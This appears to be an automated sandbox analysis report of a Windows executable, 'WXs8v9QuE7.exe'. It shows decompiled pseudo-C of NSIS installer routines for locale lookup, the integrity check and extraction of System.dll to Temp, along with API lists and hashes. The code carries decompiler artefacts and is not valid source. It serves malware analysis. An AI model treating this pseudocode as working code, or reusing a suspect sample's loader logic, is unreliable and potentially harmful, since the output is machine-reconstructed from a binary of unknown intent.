				CHAR* _t85;

				_t81 =  *0x423f50;
				_t20 = E00405F28(3);
				_t88 = _t20;
				if(_t20 == 0) {
					_t79 = 0x420538;
					"1033" = 0x7830;
					E00405A7F(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x420538, 0);
					__eflags =  *0x420538;
					if(__eflags == 0) {
						E00405A7F(0x80000003, ".DEFAULT\\Control Panel\\International",  &M00407342, 0x420538, 0);
					}
					lstrcatA("1033", _t79);
				} else {
					E00405AF6("1033",  *_t20() & 0x0000ffff);
				}
				E004038B4(_t76, _t88);
				_t84 = "C:\\Users\\alfons\\AppData\\Local\\Temp";
				 *0x423fc0 =  *0x423f58 & 0x00000020;
				 *0x423fdc = 0x10000;
				if(E0040576C(_t88, "C:\\Users\\alfons\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E0040576C(_t96, _t84) == 0) {
						E00405BBA(0, _t79, _t81, _t84,  *((intOrPtr*)(_t81 + 0x118)));
					}
					_t28 = LoadImageA( *0x423f40, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x423728 = _t28;
					if( *((intOrPtr*)(_t81 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t30 = E004038B4(_t76, __eflags);
							__eflags =  *0x423fe0;
							if( *0x423fe0 != 0) {
								_t31 = E00404F56(_t30, 0);
								__eflags = _t31;
								if(_t31 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42370c;
								if( *0x42370c == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x420510, 5);
							_t37 = E00405EBA("RichEd20");
							__eflags = _t37;
							if(_t37 == 0) {
								E00405EBA("RichEd32");
							}
							_t85 = "RichEdit20A";
							_t38 = GetClassInfoA(0, _t85, 0x4236e0);
							__eflags = _t38;
							if(_t38 == 0) {
								GetClassInfoA(0, "RichEdit", 0x4236e0);
								 *0x423704 = _t85;
								RegisterClassA(0x4236e0);
							}
							_t42 = DialogBoxParamA( *0x423f40,  *0x423720 + 0x00000069 & 0x0000ffff, 0, E00403981, 0);
							E0040353B(E0040140B(5), 1);
							return _t42;
						}
						L22:
						_t34 = 2;
						return _t34;
					} else {
						_t76 =  *0x423f40;
						 *0x4236f4 = _t28;
						_v20 = 0x624e5f;
						 *0x4236e4 = E00401000;
						 *0x4236f0 =  *0x423f40;
						 *0x423704 =  &_v20;
						if(RegisterClassA(0x4236e0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						_t12 =  &_v16; // 0x624e5f
						SystemParametersInfoA(0x30, 0, _t12, 0);
						 *0x420510 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x423f40, 0);
						goto L21;
					}
				} else {
					_t76 =  *(_t81 + 0x48);
					if(_t76 == 0) {
						goto L16;
					}
					_t79 = 0x422ee0;
					E00405A7F( *((intOrPtr*)(_t81 + 0x44)), _t76,  *((intOrPtr*)(_t81 + 0x4c)) +  *0x423f78, 0x422ee0, 0);
					_t62 =  *0x422ee0; // 0x43
					if(_t62 == 0) {
						goto L16;
					}
					if(_t62 == 0x22) {
						_t79 = 0x422ee1;
						 *((char*)(E004056B6(0x422ee1, 0x22))) = 0;
					}
					_t64 = lstrlenA(_t79) + _t79 - 4;
					if(_t64 <= _t79 || lstrcmpiA(_t64, ?str?) != 0) {
						L15:
						E00405B98(_t84, E0040568B(_t79));
						goto L16;
					} else {
						_t68 = GetFileAttributesA(_t79);
						if(_t68 == 0xffffffff) {
							L14:
							E004056D2(_t79);
							goto L15;
						}
						_t96 = _t68 & 0x00000010;
						if((_t68 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

























                                                                                                                    0x004035f1
                                                                                                                    0x004035fa
                                                                                                                    0x00403601
                                                                                                                    0x00403603
                                                                                                                    0x00403617
                                                                                                                    0x00403629
                                                                                                                    0x00403633
                                                                                                                    0x00403638
                                                                                                                    0x0040363e
                                                                                                                    0x00403651
                                                                                                                    0x00403651
                                                                                                                    0x0040365c
                                                                                                                    0x00403605
                                                                                                                    0x00403610
                                                                                                                    0x00403610
                                                                                                                    0x00403661
                                                                                                                    0x0040366b
                                                                                                                    0x00403674
                                                                                                                    0x00403679
                                                                                                                    0x0040368a
                                                                                                                    0x00403711
                                                                                                                    0x00403719
                                                                                                                    0x00403722
                                                                                                                    0x00403722
                                                                                                                    0x00403738
                                                                                                                    0x0040373e
                                                                                                                    0x0040374c
                                                                                                                    0x004037db
                                                                                                                    0x004037e3
                                                                                                                    0x004037ed
                                                                                                                    0x004037f2
                                                                                                                    0x004037f8
                                                                                                                    0x00403882
                                                                                                                    0x00403887
                                                                                                                    0x00403889
                                                                                                                    0x004038a5
                                                                                                                    0x00000000
                                                                                                                    0x004038a5
                                                                                                                    0x0040388b
                                                                                                                    0x00403891
                                                                                                                    0x00403899
                                                                                                                    0x00403899
                                                                                                                    0x00000000
                                                                                                                    0x00403891
                                                                                                                    0x00403806
                                                                                                                    0x00403811
                                                                                                                    0x00403816
                                                                                                                    0x00403818
                                                                                                                    0x0040381f
                                                                                                                    0x0040381f
                                                                                                                    0x0040382a
                                                                                                                    0x00403832
                                                                                                                    0x00403834
                                                                                                                    0x00403836
                                                                                                                    0x0040383f
                                                                                                                    0x00403842
                                                                                                                    0x00403848
                                                                                                                    0x00403848
                                                                                                                    0x00403867
                                                                                                                    0x00403878
                                                                                                                    0x00000000
                                                                                                                    0x0040387d
                                                                                                                    0x004037e5
                                                                                                                    0x004037e7
                                                                                                                    0x00000000
                                                                                                                    0x00403752
                                                                                                                    0x00403752
                                                                                                                    0x00403758
                                                                                                                    0x00403762
                                                                                                                    0x0040376a
                                                                                                                    0x00403774
                                                                                                                    0x0040377a
                                                                                                                    0x00403788
                                                                                                                    0x004038aa
                                                                                                                    0x004038aa
                                                                                                                    0x00000000
                                                                                                                    0x004038aa
                                                                                                                    0x0040378e
                                                                                                                    0x00403797
                                                                                                                    0x004037d6
                                                                                                                    0x00000000
                                                                                                                    0x004037d6
                                                                                                                    0x00403690
                                                                                                                    0x00403690
                                                                                                                    0x00403695
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0040369f
                                                                                                                    0x004036af
                                                                                                                    0x004036b4
                                                                                                                    0x004036bb
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004036bf
                                                                                                                    0x004036c1
                                                                                                                    0x004036ce
                                                                                                                    0x004036ce
                                                                                                                    0x004036d6
                                                                                                                    0x004036dc
                                                                                                                    0x00403704
                                                                                                                    0x0040370c
                                                                                                                    0x00000000
                                                                                                                    0x004036ee
                                                                                                                    0x004036ef
                                                                                                                    0x004036f8
                                                                                                                    0x004036fe
                                                                                                                    0x004036ff
                                                                                                                    0x00000000
                                                                                                                    0x004036ff
                                                                                                                    0x004036fa
                                                                                                                    0x004036fc
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004036fc
                                                                                                                    0x004036dc

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00405F28: GetModuleHandleA.KERNEL32(?,?,?,00403165,0000000D), ref: 00405F3A
                                                                                                                      • Part of subcall function 00405F28: GetProcAddress.KERNEL32(00000000,?), ref: 00405F55
                                                                                                                    • lstrcatA.KERNEL32(1033,00420538,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420538,00000000,00000003,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\WXs8v9QuE7.exe" ,00000000), ref: 0040365C
                                                                                                                    • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,00420538,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420538,00000000,00000003,C:\Users\user\AppData\Local\Temp\), ref: 004036D1
                                                                                                                    • lstrcmpiA.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,00420538,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420538,00000000), ref: 004036E4
                                                                                                                    • GetFileAttributesA.KERNEL32(Call), ref: 004036EF
                                                                                                                    • LoadImageA.USER32 ref: 00403738
                                                                                                                      • Part of subcall function 00405AF6: wsprintfA.USER32 ref: 00405B03
                                                                                                                    • RegisterClassA.USER32 ref: 0040377F
                                                                                                                    • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 00403797
                                                                                                                    • CreateWindowExA.USER32 ref: 004037D0
                                                                                                                    • ShowWindow.USER32(00000005,00000000), ref: 00403806
                                                                                                                    • GetClassInfoA.USER32 ref: 00403832
                                                                                                                    • GetClassInfoA.USER32 ref: 0040383F
                                                                                                                    • RegisterClassA.USER32 ref: 00403848
                                                                                                                    • DialogBoxParamA.USER32 ref: 00403867
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.233167417.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.233162094.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233190449.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233194465.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233219819.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233229304.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233240015.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                    • String ID: "C:\Users\user\Desktop\WXs8v9QuE7.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$6B
                                                                                                                    • API String ID: 1975747703-2892540709
                                                                                                                    • Opcode ID: 6d9bdf85a822e0f9bb9c4e2fcc7d2e939be480c33988b3e2c2e3dba5f36146f3
                                                                                                                    • Instruction ID: 6624008b3449f808402c67b3262d240ca0850aee1e0dcbc9c28568ef27b6b269
                                                                                                                    • Opcode Fuzzy Hash: 6d9bdf85a822e0f9bb9c4e2fcc7d2e939be480c33988b3e2c2e3dba5f36146f3
                                                                                                                    • Instruction Fuzzy Hash: 6A61E9B17002047EE620AF619D45E3B7ABCEB4474AF40457FF941B22E2D77D9E428A2D
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00402C55, Relevance: 26.4, APIs: 5, Strings: 10, Instructions: 182COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 78%
                                                                                                                    			E00402C55(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				long _t43;
				long _t50;
				void* _t53;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				long _t70;
				void* _t71;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				void* _t85;
				signed int _t87;
				void* _t89;
				long _t90;
				long _t93;
				void* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				_t43 = GetTickCount();
				_t91 = "C:\\Users\\alfons\\Desktop\\WXs8v9QuE7.exe";
				 *0x423f4c = _t43 + 0x3e8;
				GetModuleFileNameA(0, "C:\\Users\\alfons\\Desktop\\WXs8v9QuE7.exe", 0x400);
				_t89 = E0040586F(_t91, 0x80000000, 3);
				_v16 = _t89;
				 *0x409014 = _t89;
				if(_t89 == 0xffffffff) {
					return "Error launching installer";
				}
				_t92 = "C:\\Users\\alfons\\Desktop";
				E00405B98("C:\\Users\\alfons\\Desktop", _t91);
				E00405B98(0x42c000, E004056D2(_t92));
				_t50 = GetFileSize(_t89, 0);
				 *0x41f0e8 = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00402BF1(1);
					if( *0x423f54 == _t82) {
						goto L29;
					}
					if(_v8 == _t82) {
						L28:
						_t53 = GlobalAlloc(0x40, _v24); // executed
						_t94 = _t53;
						E004030B3( *0x423f54 + 0x1c);
						_push(_v24);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff); // executed
						_t57 = E00402E8E(); // executed
						if(_t57 == _v24) {
							 *0x423f50 = _t94;
							 *0x423f58 =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x423f5c =  *0x423f5c + 1;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
							 *(_t94 + 0x3c) = _t60;
							E00405830(0x423f60, _t94 + 4, 0x40);
							return 0;
						}
						goto L29;
					}
					E004030B3( *0x40b0d8);
					if(E00403081( &_a4, 4) == 0 || _v12 != _a4) {
						goto L29;
					} else {
						goto L28;
					}
				} else {
					do {
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~( *0x423f54) & 0x00007e00) + 0x200;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						_t71 = E00403081(0x4170e8, _t90); // executed
						if(_t71 == 0) {
							E00402BF1(1);
							L29:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						if( *0x423f54 != 0) {
							if((_a4 & 0x00000002) == 0) {
								E00402BF1(0);
							}
							goto L20;
						}
						E00405830( &_v44, 0x4170e8, 0x1c);
						_t77 = _v44;
						if((_t77 & 0xfffffff0) == 0 && _v40 == 0xdeadbeef && _v28 == 0x74736e49 && _v32 == 0x74666f73 && _v36 == 0x6c6c754e) {
							_a4 = _a4 | _t77;
							_t87 =  *0x40b0d8; // 0x8600
							 *0x423fe0 =  *0x423fe0 | _a4 & 0x00000002;
							_t80 = _v20;
							 *0x423f54 = _t87;
							if(_t80 > _t93) {
								goto L29;
							}
							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
								_v8 = _v8 + 1;
								_t93 = _t80 - 4;
								if(_t90 > _t93) {
									_t90 = _t93;
								}
								goto L20;
							} else {
								break;
							}
						}
						L20:
						if(_t93 <  *0x41f0e8) {
							_v12 = E00405F97(_v12, 0x4170e8, _t90);
						}
						 *0x40b0d8 =  *0x40b0d8 + _t90;
						_t93 = _t93 - _t90;
					} while (_t93 > 0);
					_t82 = 0;
					goto L24;
				}
			}






























                                                                                                                    0x00402c5d
                                                                                                                    0x00402c60
                                                                                                                    0x00402c63
                                                                                                                    0x00402c66
                                                                                                                    0x00402c6c
                                                                                                                    0x00402c7d
                                                                                                                    0x00402c82
                                                                                                                    0x00402c95
                                                                                                                    0x00402c9a
                                                                                                                    0x00402c9d
                                                                                                                    0x00402ca3
                                                                                                                    0x00000000
                                                                                                                    0x00402ca5
                                                                                                                    0x00402cb0
                                                                                                                    0x00402cb6
                                                                                                                    0x00402cc7
                                                                                                                    0x00402cce
                                                                                                                    0x00402cd6
                                                                                                                    0x00402cdb
                                                                                                                    0x00402cdd
                                                                                                                    0x00402dca
                                                                                                                    0x00402dcc
                                                                                                                    0x00402dd8
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00402ddd
                                                                                                                    0x00402e01
                                                                                                                    0x00402e06
                                                                                                                    0x00402e0c
                                                                                                                    0x00402e17
                                                                                                                    0x00402e1c
                                                                                                                    0x00402e1f
                                                                                                                    0x00402e20
                                                                                                                    0x00402e21
                                                                                                                    0x00402e23
                                                                                                                    0x00402e2b
                                                                                                                    0x00402e42
                                                                                                                    0x00402e4a
                                                                                                                    0x00402e4f
                                                                                                                    0x00402e51
                                                                                                                    0x00402e51
                                                                                                                    0x00402e59
                                                                                                                    0x00402e59
                                                                                                                    0x00402e5c
                                                                                                                    0x00402e5d
                                                                                                                    0x00402e5d
                                                                                                                    0x00402e60
                                                                                                                    0x00402e62
                                                                                                                    0x00402e62
                                                                                                                    0x00402e6c
                                                                                                                    0x00402e72
                                                                                                                    0x00402e80
                                                                                                                    0x00000000
                                                                                                                    0x00402e85
                                                                                                                    0x00000000
                                                                                                                    0x00402e2b
                                                                                                                    0x00402de5
                                                                                                                    0x00402df7
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00402ce3
                                                                                                                    0x00402ce8
                                                                                                                    0x00402ced
                                                                                                                    0x00402cf1
                                                                                                                    0x00402cf8
                                                                                                                    0x00402cff
                                                                                                                    0x00402d01
                                                                                                                    0x00402d01
                                                                                                                    0x00402d05
                                                                                                                    0x00402d0c
                                                                                                                    0x00402e36
                                                                                                                    0x00402e2d
                                                                                                                    0x00000000
                                                                                                                    0x00402e2d
                                                                                                                    0x00402d19
                                                                                                                    0x00402d99
                                                                                                                    0x00402d9d
                                                                                                                    0x00402da2
                                                                                                                    0x00000000
                                                                                                                    0x00402d99
                                                                                                                    0x00402d22
                                                                                                                    0x00402d27
                                                                                                                    0x00402d2f
                                                                                                                    0x00402d55
                                                                                                                    0x00402d5b
                                                                                                                    0x00402d64
                                                                                                                    0x00402d6a
                                                                                                                    0x00402d6f
                                                                                                                    0x00402d75
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00402d7f
                                                                                                                    0x00402d87
                                                                                                                    0x00402d8a
                                                                                                                    0x00402d8f
                                                                                                                    0x00402d91
                                                                                                                    0x00402d91
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00402d7f
                                                                                                                    0x00402da3
                                                                                                                    0x00402da9
                                                                                                                    0x00402db5
                                                                                                                    0x00402db5
                                                                                                                    0x00402db8
                                                                                                                    0x00402dbe
                                                                                                                    0x00402dc0
                                                                                                                    0x00402dc8
                                                                                                                    0x00000000
                                                                                                                    0x00402dc8

                                                                                                                    APIs
                                                                                                                    • GetTickCount.KERNEL32 ref: 00402C66
                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\WXs8v9QuE7.exe,00000400), ref: 00402C82
                                                                                                                      • Part of subcall function 0040586F: GetFileAttributesA.KERNELBASE(00000003,00402C95,C:\Users\user\Desktop\WXs8v9QuE7.exe,80000000,00000003), ref: 00405873
                                                                                                                      • Part of subcall function 0040586F: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405895
                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,0042C000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\WXs8v9QuE7.exe,C:\Users\user\Desktop\WXs8v9QuE7.exe,80000000,00000003), ref: 00402CCE
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.233167417.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.233162094.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233190449.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233194465.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233219819.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233229304.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233240015.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                    • String ID: "C:\Users\user\Desktop\WXs8v9QuE7.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\WXs8v9QuE7.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft$pA
                                                                                                                    • API String ID: 4283519449-369184720
                                                                                                                    • Opcode ID: d74ddf077dad9ccce0d63da47009af9ced08a9d3a58e0b3746407ee1fc4199ad
                                                                                                                    • Instruction ID: 62828f2e2b01cd2e9021f71d1007b468b6294b04ed91f3cf43b909f99e7c5814
                                                                                                                    • Opcode Fuzzy Hash: d74ddf077dad9ccce0d63da47009af9ced08a9d3a58e0b3746407ee1fc4199ad
                                                                                                                    • Instruction Fuzzy Hash: C151E371E00214ABDB209F64DE89B9E7BB4EF04355F20403BF904B62D1C7BC9E458A9D
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00401751, Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147stringtimeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 60%
                                                                                                                    			E00401751(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				void* _t85;

				_t75 = __ebx;
				_t82 = E00402A29(0x31);
				 *(_t85 - 0xc) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
				_t33 = E004056F8(_t82);
				_push(_t82);
				if(_t33 == 0) {
					lstrcatA(E0040568B(E00405B98(0x409c10, "C:\\Users\\alfons\\AppData\\Local\\Temp")), ??);
				} else {
					_push(0x409c10);
					E00405B98();
				}
				E00405DFA(0x409c10);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E00405E93(0x409c10);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E00405850(0x409c10);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E0040586F(0x409c10, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 8) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E00404E84(0xffffffe2,  *(_t85 - 0xc));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x423fc8;
						goto L32;
					} else {
						E00405B98(0x40a410, 0x425000);
						E00405B98(0x425000, 0x409c10);
						E00405BBA(_t75, 0x40a410, 0x409c10, "C:\Users\alfons\AppData\Local\Temp\nsa7685.tmp\System.dll",  *((intOrPtr*)(_t85 - 0x14)));
						E00405B98(0x425000, 0x40a410);
						_t62 = E00405459("C:\Users\alfons\AppData\Local\Temp\nsa7685.tmp\System.dll",  *(_t85 - 0x28) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x423fc8 =  &( *0x423fc8->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(0x409c10);
								_push(0xfffffffa);
								E00404E84();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E00404E84(0xffffffea,  *(_t85 - 0xc));
				 *0x423ff4 =  *0x423ff4 + 1;
				_push(_t75);
				_push(_t75);
				_push( *(_t85 - 8));
				_push( *((intOrPtr*)(_t85 - 0x20)));
				_t43 = E00402E8E(); // executed
				 *0x423ff4 =  *0x423ff4 - 1;
				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x1c) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 8), _t85 - 0x1c, _t75, _t85 - 0x1c); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t85 - 8)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E00405BBA(_t75, _t80, 0x409c10, 0x409c10, 0xffffffee);
					} else {
						E00405BBA(_t75, _t80, 0x409c10, 0x409c10, 0xffffffe9);
						lstrcatA(0x409c10,  *(_t85 - 0xc));
					}
					_push(0x200010);
					_push(0x409c10);
					E00405459();
					goto L29;
				}
				goto L33;
			}
















                                                                                                                    0x00401751
                                                                                                                    0x00401758
                                                                                                                    0x00401761
                                                                                                                    0x00401764
                                                                                                                    0x00401767
                                                                                                                    0x0040176c
                                                                                                                    0x00401774
                                                                                                                    0x00401790
                                                                                                                    0x00401776
                                                                                                                    0x00401776
                                                                                                                    0x00401777
                                                                                                                    0x00401777
                                                                                                                    0x00401796
                                                                                                                    0x004017a0
                                                                                                                    0x004017a0
                                                                                                                    0x004017a4
                                                                                                                    0x004017a7
                                                                                                                    0x004017ac
                                                                                                                    0x004017ae
                                                                                                                    0x004017b0
                                                                                                                    0x004017b5
                                                                                                                    0x004017b5
                                                                                                                    0x004017c0
                                                                                                                    0x004017c0
                                                                                                                    0x004017d1
                                                                                                                    0x004017d3
                                                                                                                    0x004017d3
                                                                                                                    0x004017d4
                                                                                                                    0x004017d4
                                                                                                                    0x004017d7
                                                                                                                    0x004017da
                                                                                                                    0x004017dd
                                                                                                                    0x004017dd
                                                                                                                    0x004017e4
                                                                                                                    0x004017f3
                                                                                                                    0x004017f8
                                                                                                                    0x004017fb
                                                                                                                    0x004017fe
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00401800
                                                                                                                    0x00401803
                                                                                                                    0x0040185d
                                                                                                                    0x00401862
                                                                                                                    0x004015a8
                                                                                                                    0x0040268f
                                                                                                                    0x0040268f
                                                                                                                    0x004028be
                                                                                                                    0x004028c1
                                                                                                                    0x004028c1
                                                                                                                    0x00000000
                                                                                                                    0x00401805
                                                                                                                    0x0040180b
                                                                                                                    0x00401816
                                                                                                                    0x00401823
                                                                                                                    0x0040182e
                                                                                                                    0x00401844
                                                                                                                    0x00401844
                                                                                                                    0x00401847
                                                                                                                    0x00000000
                                                                                                                    0x0040184d
                                                                                                                    0x0040184d
                                                                                                                    0x0040184e
                                                                                                                    0x0040186b
                                                                                                                    0x004028c7
                                                                                                                    0x004028c7
                                                                                                                    0x004028c7
                                                                                                                    0x00401850
                                                                                                                    0x00401850
                                                                                                                    0x00401851
                                                                                                                    0x00401492
                                                                                                                    0x00402241
                                                                                                                    0x00402241
                                                                                                                    0x00402241
                                                                                                                    0x0040184e
                                                                                                                    0x00401847
                                                                                                                    0x004028c9
                                                                                                                    0x004028cd
                                                                                                                    0x004028cd
                                                                                                                    0x0040187b
                                                                                                                    0x00401880
                                                                                                                    0x00401886
                                                                                                                    0x00401887
                                                                                                                    0x00401888
                                                                                                                    0x0040188b
                                                                                                                    0x0040188e
                                                                                                                    0x00401893
                                                                                                                    0x00401899
                                                                                                                    0x0040189d
                                                                                                                    0x0040189f
                                                                                                                    0x004018a7
                                                                                                                    0x004018b3
                                                                                                                    0x004018a1
                                                                                                                    0x004018a1
                                                                                                                    0x004018a5
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004018a5
                                                                                                                    0x004018bc
                                                                                                                    0x004018c2
                                                                                                                    0x004018c4
                                                                                                                    0x00000000
                                                                                                                    0x004018ca
                                                                                                                    0x004018ca
                                                                                                                    0x004018cd
                                                                                                                    0x004018e5
                                                                                                                    0x004018cf
                                                                                                                    0x004018d2
                                                                                                                    0x004018db
                                                                                                                    0x004018db
                                                                                                                    0x004018ea
                                                                                                                    0x004018ef
                                                                                                                    0x0040223c
                                                                                                                    0x00000000
                                                                                                                    0x0040223c
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401790
                                                                                                                    • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017BA
                                                                                                                      • Part of subcall function 00405B98: lstrcpynA.KERNEL32(?,?,00000400,004031A9,00423740,NSIS Error), ref: 00405BA5
                                                                                                                      • Part of subcall function 00404E84: lstrlenA.KERNEL32(0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000,?), ref: 00404EBD
                                                                                                                      • Part of subcall function 00404E84: lstrlenA.KERNEL32(00402FBE,0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000), ref: 00404ECD
